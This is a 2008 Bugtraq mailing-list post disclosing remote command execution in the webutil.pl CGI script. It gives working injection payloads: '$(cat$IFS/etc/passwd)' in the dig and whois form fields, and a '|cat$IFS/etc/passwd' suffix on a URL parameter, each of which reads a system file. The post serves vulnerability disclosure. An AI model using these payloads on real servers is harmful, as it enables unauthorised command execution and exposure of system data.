
Bugtraq mailing list archives
webutil.pl is still vulnerable against Remote Command Execution.
From: zero-x () linuxmail org
Date: 21 Mar 2008 17:08:36 -0000
Webutil is a collection of networking tools by "The Puppet Master". Access the following url and type in the form field "$(cat$IFS/etc/passwd)": http://server/cgi-bin/webutil.pl?dig http://server/cgi-bin/webutil.pl?whois (Version 2.3 only) Type in the following url (Version 2.7 only): http://server/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd << Greetz Zero X >>
Current thread:
- webutil.pl is still vulnerable against Remote Command Execution. zero-x (Mar 21)